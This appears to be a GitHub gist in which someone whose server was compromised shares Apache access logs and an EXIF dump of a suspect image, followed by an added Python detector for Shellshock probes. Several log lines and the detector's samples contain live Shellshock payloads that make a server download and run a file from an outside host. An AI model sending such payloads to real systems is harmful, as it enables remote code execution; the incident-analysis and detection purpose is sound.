@vishwakarma09
Last active February 12, 2016 11:14
Hi David,
My server was compromised a few days back. Would you like to take a look? Here are a few access logs:
120.25.200.39 - - [16/Jan/2016:21:00:18 +0000] "GET /cgi-sys/php5 HTTP/1.1" 404 467 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png \");'"
120.25.200.39 - - [16/Jan/2016:21:00:19 +0000] "GET /cgi-bin/php.fcgi HTTP/1.1" 404 471 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png \");'"
120.25.200.39 - - [16/Jan/2016:21:00:19 +0000] "GET /cgi-bin/index.cgi HTTP/1.1" 404 472 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png \");'"
66.249.74.94 - - [16/Jan/2016:21:05:05 +0000] "GET /robots.txt HTTP/1.1" 404 502 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.74.94 - - [16/Jan/2016:21:05:05 +0000] "GET /%C3%BCcretsiz-3d-sohbet.html HTTP/1.1" 404 515 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.74.92 - - [16/Jan/2016:21:05:06 +0000] "GET /bedava-olan-arkada%C5%9Fl%C4%B1k-siteleri.html HTTP/1.1" 404 530 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.74.94 - - [16/Jan/2016:22:50:24 +0000] "GET /t%C3%BCrk%C3%A7e-kameral%C4%B1-sohbet-bedava.html HTTP/1.1" 404 529 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.130.5.209 - - [16/Jan/2016:23:03:38 +0000] "GET /xmlrpc.php HTTP/1.1" 404 446 "-" "-"
54.166.165.82 - - [17/Jan/2016:01:07:40 +0000] "HEAD / HTTP/1.1" 200 226 "-" "Cloud mapping experiment. Contact research@pdrlabs.net"
66.249.74.94 - - [17/Jan/2016:04:20:41 +0000] "GET /t%C3%BCrk%C3%A7e-kameral%C4%B1-sohbet-bedava.html HTTP/1.1" 404 529 "-" "Mozilla/5.0 (iPhone;
So, when I decided to dig in, I picked a JPG file from the above server. The original file http://204.232.209.188/images/freshcafe/slice_30_192.png has been removed, so I picked another from the server root: http://204.232.209.188/images/earlybird.jpg
Then I opened this file in an EXIF editor (I used this one: http://www.programosy.pl/program,exifeditor.html). Here are the contents:
<?xml version="1.0" encoding="Windows-1252"?>
<!--EXIF export from photoC:\Users\Rajesh\Desktop\dddd.xml by EXIFeditor-->
<ExifEditor>
<file filename="C:\Users\Rajesh\Desktop\earlybird.jpg">
<Tag ID="20736" Type="4" Name="FrameDelay" Value="0" />
<Tag ID="20737" Type="3" Name="LoopCount" Value="1" />
<Tag ID="20738" Type="1" Name="" Value="?????y??QTG)?l;$&#x1B;&#x14;&#x16;&#x5;&#x4;J)&amp;??e???ugD??R83#%&#x4;&#x6;E&#x16;&#x16;2*&#x19;5&#x6;&#xA;f&quot;!&#x15;&#x13;&#xB;??d??\C:&quot;?44??Y??J6&#x19;&#x15;??bKB'??a??R??[?????i??QD&#x8;&#xC;YR6?64c&#x10;&#x13;t&#x18;&#x19;&#x1A;&#x18;&#xE;?BB????rBW&#xC;&#x10;?{D?????L??[TL2??Mz&#x19;&#x1B;??RH&#xC;&#x10;??ZX! j&#x12;&#x14;91&#x1B;??\[&#x10;&#x13;?{J?uB?kk)% aR1IF2??lkY2?mB{e:??q+!&#x19;??cq]4??mm &#x1E;??`dR+?+)4' ??T??e?sK?+)?yDk&#x19;&#x1A;??J??Ysa9&#xC;&#xA;&#x7;s&quot;!R&#x10;&#x12;&quot;&#x1F;&#x11;?+(g\D?xS &#x8;&#x4;t&#x1C;&#x1E;{&quot; ??fk\9??n &#x3;&#x2;l&#x14;&#x17;*&quot;&#x14;c&#x1A;&#x1B;?{kP&#x1A;&#x1A;?0-+)&#x1A;{34?}J??UF&quot;&#x1E;[&#x1B;&#x1B;:&#xB;&#xF;??W??r?????acZ;?}Pr&#x14;&#x18;??i&#x3;&#x2;&#x1;?????g?yL??bmaB??Y?!!?uI|))zb4i;??^??z??x?($#&quot;&#x18;ZSGc&#x14;&#x15;?($?SU??Nr**?qB??\q&#x14;&#x14;|($?&lt;&gt;[&#x14;&#x17;!&#x17;&#xF;?0.??FtjWyrdP&#xB;&#xE;R&#x13;&#x17;ta4??aaU7hU0??U??ijbV?????aU&#x1C;&#x1D;^L)?,-|nHz0-?}F?$&quot;la:??keY3,(&#x14;r($'&#xB;&#xD;??f??My,.rV???&#xF;&#x10; qZ-:9+??]??r&#x1B;&#x1C;&#x12;B=-?uI[O-??M??Q..#{$$&#x16;&#xC;&#xC;?&#x1C;&#x1B;a./e))P@ r&#x18;&#x14;?$%?????iQ&#x18;&#x14;q$*]&#xC;&#x10;\00'&#x1F;&#xF;0&#x10;&#x10;z&#x18;&#x14; &#x1C;l&#x19;&#x14;#'&#x1D;l-,Y&#x18;&#x18;?-2[))??a??i??h??a&#x4;&#x8;&#x4;??m&#xF;&#x10;&#x10;??e??i&#xC;&#xC;&#xD;??f??m??Y??^??i??g?yE??u??U^M1??V~&#x1C; ?????Qe&#x18;&#x14;??o&#x4;&#x7;&#x8;&#xC;&#x4;&#x4;v&#x14;&#x14;?yM???0$&#x12;???AA1" />
<Tag ID="20739" Type="1" Name="" Value="" />
<Tag ID="20625" Type="3" Name="ChrominanceTable" Value="2" />
<Tag ID="20624" Type="3" Name="LuminanceTable" Value="2" />
</file>
</ExifEditor>
Do you think this is such an attack?
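As an added illustration (not part of the gist or its author's work): the User-Agent strings in the first three log lines carry the `() { :;};` prefix that Shellshock probes use to push a bash function definition through a CGI request header, followed by commands that fetch a second stage. The script below is a defender's detector that parses combined-format lines, flags that prefix, extracts the download URLs as indicators, and records whether the probed path would have reached a CGI handler and what status the server returned. The log lines, IP addresses and URL embedded in it are constructed samples, not the gist's own values.

```python
import re
from dataclasses import dataclass
# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>.*)"$'
)
# Shellshock probes put a bash function definition in a header: "() {", a closing brace, ";" and then a command.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;')
# Download URLs inside the payload are the indicators to block and hunt for.
URL_RE = re.compile(r'https?://[^\s"\'\\;]+')
# Paths a CGI handler would serve (where a header value becomes an environment variable).
CGI_PATH_RE = re.compile(r'/cgi-(bin|sys)/|\.(cgi|fcgi|pl|sh)(\?|$)')

# Constructed sample lines (documentation-range IPs), shaped like the gist's log.
SAMPLE_LOG = r'''
192.0.2.10 - - [16/Jan/2016:21:00:18 +0000] "GET /cgi-sys/php5 HTTP/1.1" 404 467 "-" "() { :;};/usr/bin/perl -e 'system(\" wget http://203.0.113.5/p.png ; curl -O http://203.0.113.5/p.png \");'"
192.0.2.10 - - [16/Jan/2016:21:00:19 +0000] "GET /cgi-bin/index.cgi HTTP/1.1" 404 472 "-" "() { :;}; /bin/bash -c \"curl http://203.0.113.5/p.png\""
198.51.100.7 - - [16/Jan/2016:21:05:05 +0000] "GET /robots.txt HTTP/1.1" 404 502 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
'''.strip().splitlines()

@dataclass
class Finding:
    ip: str
    time: str
    path: str
    status: int       # 404 means the probed CGI path did not exist; a 200 needs triage
    cgi_target: bool  # request path would have reached a CGI handler
    urls: list        # download URLs extracted from the payload

def parse_line(line):
    """Combined-log fields as a dict, or None when the line does not parse."""
    m = LOG_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None

def detect_shellshock(lines):
    """Flag lines whose User-Agent or Referer carries a Shellshock function prefix."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        headers = (rec["ua"], rec["referer"])
        if not any(SHELLSHOCK_RE.search(h) for h in headers):
            continue
        urls = sorted({u for h in headers for u in URL_RE.findall(h)})
        findings.append(Finding(rec["ip"], rec["time"], rec["path"], int(rec["status"]),
                                bool(CGI_PATH_RE.search(rec["path"])), urls))
    return findings
```

Run `detect_shellshock` over the real access log to list every probing source, the paths it tried, and the hosts it wanted the server to download from; a flagged request with a 200 status against a path that actually maps to a CGI script is the case that warrants a deeper host investigation.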